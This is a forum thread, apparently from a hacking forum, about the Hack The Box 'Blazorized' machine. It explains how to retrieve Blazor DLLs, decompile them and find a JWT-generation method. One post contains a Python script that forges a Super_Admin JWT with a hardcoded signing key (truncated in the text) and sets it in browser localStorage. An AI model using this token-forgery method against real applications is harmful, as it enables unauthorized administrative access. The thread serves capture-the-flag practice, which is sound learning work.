[macavitysworld]

HTB - Blazorized Writeup 

https://katopia.me/HTB/Machines/Medium/blazorized

[OneplusSuper]

Thank you @macavitysworld

[mazafaka555]

"Deobfuscating blazor.webassembly.js reveals the path _framework/blazor.boot.json which contains metadata about the application such as DLLs"

you don't need to "deobfuscate" anything. simply proxy all the traffic through burp, browse for a little and here you have it.
in the "Targets" tab you'll see _framework/blazor.boot.json. then fetch it and you have all the dlls you need.

[macavitysworld]

"Deobfuscating blazor.webassembly.js reveals the path _framework/blazor.boot.json which contains metadata about the application such as DLLs"

you don't need to "deobfuscate" anything. simply proxy all the traffic through burp, browse for a little and here you have it.
in the "Targets" tab you'll see _framework/blazor.boot.json. then fetch it and you have all the dlls you need.

Yeah you could do that!

[ph4n70m]

are you kidding me

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[macavitysworld]

are you kidding me

Is it a joke or a real question?

[imassxck]

thank you a lot for sharing.

[fakerbdayX]

In 0x2 how do I download the dlls ?
Also how do you conclude it's a jwt and you find the needed format?

[slukl]

In 0x2 how do I download the dlls ?
Also how do you conclude it's a jwt and you find the needed format?

Check the history in burp/zap or any other interception proxy or developer tools. Moreover the json gives a more information and at the bottom you'll see a helper.dll. You can easily access them via url.
https://ibb.co/KzCT8LX

Then you can analyze the dll with dnspy: https://github.com/dnSpy/dnSpy/releases or any other dll-decompiler. In the helper.dll you'll find the functions and all other informations.
https://ibb.co/rHSDSXg

In the other thread somebody postest already a script to generate a valid token:

import jwt
import datetime

# Define the payload
payload = {
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
        "Super_Admin"
    ],
    "exp": datetime.datetime.utcnow() + datetime.timedelta(seconds=600),  # Updated timestamp for expiration
    "iss": "http://api.blazorized.htb",
    "aud": "http://admin.blazorized.htb"
}

# Define the symmetric key
jwt_symmetric_security_key = "8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2>

# Encode the JWT token
jwt_token = jwt.encode(payload, jwt_symmetric_security_key, algorithm='HS512')

# Print the JWT token (optional)
print(f"Generated JWT token: {jwt_token}")

# JavaScript snippet to set JWT token in local storage
js_code = f"""
localStorage.setItem('jwt', '{jwt_token}');
console.log('JWT token set in local storage');
"""

# Print the JavaScript code
print("JavaScript to set JWT in local storage:")
print(js_code)

[macavitysworld]

In 0x2 how do I download the dlls ?
Also how do you conclude it's a jwt and you find the needed format?

Good question, I think you like copy pasting, without even investigating. But, I'll explain;

If you deobfuscate `blazor.webassembly.js` you can find the path `_framework/blazor.boot.json` which contains metadata of the application including th DLL's that need to be loaded, entrypoints and other configurations. You can also find it via burp, which ever feels comfortable. Once you have the url's of the DLL's you can download it via your browser, just visit the url. And if you decompile `Blazorized.Helpers` you can find `GenerateSuperAdminJWT` method which generates jwt with specific format.